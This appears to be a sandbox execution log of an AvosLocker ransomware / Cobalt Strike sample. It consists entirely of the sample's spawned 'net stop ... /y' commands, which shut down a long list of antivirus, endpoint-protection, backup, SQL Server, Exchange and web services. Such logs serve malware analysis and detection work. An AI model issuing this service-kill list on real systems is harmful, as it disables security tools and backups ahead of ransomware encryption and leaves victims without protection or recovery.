C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

